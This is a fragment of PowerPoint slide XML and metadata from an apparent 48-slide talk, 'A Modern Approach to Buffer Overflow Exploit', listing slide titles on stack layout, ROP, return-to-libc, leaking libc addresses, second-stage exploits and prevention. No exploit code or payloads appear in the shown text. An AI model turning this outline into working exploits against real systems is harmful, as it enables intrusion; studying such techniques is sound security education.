                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Instruction pointer</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="242494571"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189769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C1F875F-F32C-D31C-BF3D-3F1D739384C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6359768" y="2637691"/>
            <a:ext cx="2085033" cy="10718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Widescreen</PresentationFormat>
  <Slides>48</Slides>
  <Notes>38</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Organic</vt:lpstr>
      <vt:lpstr>A Modern Approach to  Buffer Overflow Exploit </vt:lpstr>
      <vt:lpstr>Whoami? </vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Why is Buffer Overflow (BOF) relevant?</vt:lpstr>
      <vt:lpstr>Why is Buffer Overflow (BOF) relevant?</vt:lpstr>
      <vt:lpstr>What is Buffer Overflow?</vt:lpstr>
      <vt:lpstr>How does Stack work in a computer memory?</vt:lpstr>
      <vt:lpstr>Common CPU Registers (x86_64)</vt:lpstr>
      <vt:lpstr>Linux Calling Convention</vt:lpstr>
      <vt:lpstr>Linux Calling Convention</vt:lpstr>
      <vt:lpstr>Linux Calling Convention</vt:lpstr>
      <vt:lpstr>Linux Calling Convention</vt:lpstr>
      <vt:lpstr>Traditional Buffer Overflow Exploit</vt:lpstr>
      <vt:lpstr>Traditional Buffer Overflow Exploit (cont.)</vt:lpstr>
      <vt:lpstr>Traditional Buffer Overflow Exploit (cont.)</vt:lpstr>
      <vt:lpstr>Traditional Buffer Overflow Exploit (cont.)</vt:lpstr>
      <vt:lpstr>Why does traditional BOF no longer work?</vt:lpstr>
      <vt:lpstr>Return Object Programing (ROP)</vt:lpstr>
      <vt:lpstr>Return Object Programing (ROP)</vt:lpstr>
      <vt:lpstr>Return to Libc</vt:lpstr>
      <vt:lpstr>ROP Exploitation</vt:lpstr>
      <vt:lpstr>ROP Exploitation (cont.)</vt:lpstr>
      <vt:lpstr>ROP Exploitation (cont.)</vt:lpstr>
      <vt:lpstr>ROP Exploitation (cont.) </vt:lpstr>
      <vt:lpstr>ROP Exploitation (cont.) </vt:lpstr>
      <vt:lpstr>ROP Exploitation (cont.) </vt:lpstr>
      <vt:lpstr>Leaking Libc Address</vt:lpstr>
      <vt:lpstr>Leaking Libc Address</vt:lpstr>
      <vt:lpstr>Leaking Libc Address (cont.)</vt:lpstr>
      <vt:lpstr>Leaking Libc Address (cont.)</vt:lpstr>
      <vt:lpstr>Leaking Libc Address (cont.)</vt:lpstr>
      <vt:lpstr>Leaking Libc Address (cont.)</vt:lpstr>
      <vt:lpstr>Time To Do Some Math</vt:lpstr>
      <vt:lpstr>Time To Do Some Math</vt:lpstr>
      <vt:lpstr>Time To Do Some Math</vt:lpstr>
      <vt:lpstr>Time To Do Some Math</vt:lpstr>
      <vt:lpstr>Time To Do Some Math</vt:lpstr>
      <vt:lpstr>Second Stage Exploit</vt:lpstr>
      <vt:lpstr>Second Stage Exploit (cont.)</vt:lpstr>
      <vt:lpstr>Second Stage Exploit (cont.)</vt:lpstr>
      <vt:lpstr>Second Stage Exploit (cont.)</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Demo (cont.)</vt:lpstr>
      <vt:lpstr>How to prevent BOF exploits</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Questions/Comments</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Code and Presentation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66</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-05T04:31:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-16T05:05:13Z</dcterms:modified>
</cp:coreProperties>
</file>